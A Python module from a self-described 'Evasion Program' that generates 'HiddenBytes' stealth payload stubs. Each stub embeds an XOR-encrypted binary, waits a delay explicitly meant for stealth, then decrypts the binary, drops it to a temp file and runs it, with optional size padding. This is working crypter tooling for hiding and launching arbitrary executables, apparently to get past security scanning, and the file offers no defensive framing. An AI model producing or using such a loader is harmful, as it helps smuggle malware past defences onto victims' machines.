"""
Stub generation for the Evasion Program.

Contains the self-decrypting payload template and the function to
populate it with encrypted binary data and configuration.
"""

import base64

# ---------------------------------------------------------------------------
# Stub Template
# ---------------------------------------------------------------------------
# Escaped for .format(): placeholders are {payload_b64!r}, {delay}, {padding_size}
# All other braces are literal (escaped via string concatenation instead of f-strings).

STUB_TEMPLATE = '''#!/usr/bin/env python3
"""
HiddenBytes - Stealth Payload
Generated by the Evasion Program.
This binary self-decrypts and executes after a delay.
"""

import base64
import subprocess
import sys
import tempfile
import time

ENCRYPTED_PAYLOAD = {payload_b64!r}
DECRYPTION_DELAY = {delay}
PADDING_SIZE = {padding_size}


def decrypt_payload(data: bytes) -> bytes:
    """Decrypt the embedded binary payload using XOR."""
    sep = b'||KEY||'
    sep_idx = data.rfind(sep)
    if sep_idx == -1:
        print("[ERROR] Invalid encrypted data")
        sys.exit(1)
    encrypted_data = data[:sep_idx]
    key = data[sep_idx + len(sep):]
    key_len = len(key)
    decrypted = bytearray(len(encrypted_data))
    for i in range(len(encrypted_data)):
        decrypted[i] = encrypted_data[i] ^ key[i % key_len]
    return bytes(decrypted)


def is_python_script(data: bytes) -> bool:
    """Detect if the decrypted data is a Python script."""
    try:
        text = data.decode('utf-8')
        # Has a Python shebang
        if text.startswith('#!/usr/bin/env python') or text.startswith('#!/usr/bin/python'):
            return True
        # No shebang at all — could be a Python module or simple script
        if not text.startswith('#!'):
            keywords = ['import ', 'from ', 'def ', 'class ', 'print(']
            return any(kw in text[:1000] for kw in keywords)
        return False
    except UnicodeDecodeError:
        return False


def delayed_execution():
    """Enforce execution delay for stealth purposes."""
    if DECRYPTION_DELAY > 0:
        message = "[INFO] Execution delayed by " + str(DECRYPTION_DELAY) + " seconds..."
        print(message)
        print("[INFO] To bypass: Waiting for scheduled execution...")
        for remaining in range(DECRYPTION_DELAY, 0, -1):
            sys.stdout.write("\\r[INFO] " + str(remaining) + " seconds remaining...")
            sys.stdout.flush()
            time.sleep(1)
        print("\\n[INFO] Delay complete. Proceeding with decryption...")


def main():
    """Main execution flow."""
    print("[INFO] HiddenBytes Payload Loader")
    print("[INFO] Initializing...")

    try:
        encrypted_bytes = base64.b64decode(ENCRYPTED_PAYLOAD)
    except Exception as decode_err:
        print("[ERROR] Failed to decode payload: " + str(decode_err))
        sys.exit(1)

    delayed_execution()

    print("[INFO] Binary decrypted successfully.")
    try:
        decrypted_binary = decrypt_payload(encrypted_bytes)
    except Exception as decrypt_err:
        print("[ERROR] Decryption failed: " + str(decrypt_err))
        sys.exit(1)

    try:
        # Detect binary type and choose appropriate temp suffix
        if is_python_script(decrypted_binary):
            suffix = '.py'
        else:
            suffix = '.exe'

        with tempfile.NamedTemporaryFile(delete=False, suffix=suffix) as tmp_file:
            tmp_path = tmp_file.name
            tmp_file.write(decrypted_binary)
            tmp_file.flush()

        print("[INFO] Target program executed.")
        print("[INFO] Temporary binary: " + tmp_path)

        # When running inside a PyInstaller bundle (frozen), sys.executable
        # points to the bundle itself, not a real Python interpreter.
        # In that case, call the temp file directly.
        frozen = getattr(sys, 'frozen', False)
        use_interpreter = suffix == '.py' and not frozen

        if use_interpreter:
            subprocess.run([sys.executable, tmp_path], capture_output=False)
        else:
            subprocess.call([tmp_path])
    except Exception as exec_err:
        print("[ERROR] Execution failed: " + str(exec_err))
        sys.exit(1)


if __name__ == "__main__":
    main()
'''


def generate_stub(encrypted_payload: bytes, delay: int, padding_size_mb: int) -> str:
    """Generate a Python stub that contains the encrypted payload and
    handles decryption, delay, and execution at runtime.

    Args:
        encrypted_payload: XOR-encrypted binary bytes (key appended)
        delay: Seconds to wait before decrypting and executing
        padding_size_mb: Size in MB to pad the output file to

    Returns:
        Complete Python source code of the stealth payload
    """
    payload_b64 = base64.b64encode(encrypted_payload).decode('ascii')

    stub_code = STUB_TEMPLATE.format(
        payload_b64=payload_b64,
        delay=delay,
        padding_size=padding_size_mb,
    )

    if padding_size_mb > 0:
        stub_code += "\n# Padding data: " + str(padding_size_mb) + " MB\n"
        stub_code += "# " + "PADDING_DATA_" * 1000 + "\n"

    return stub_code
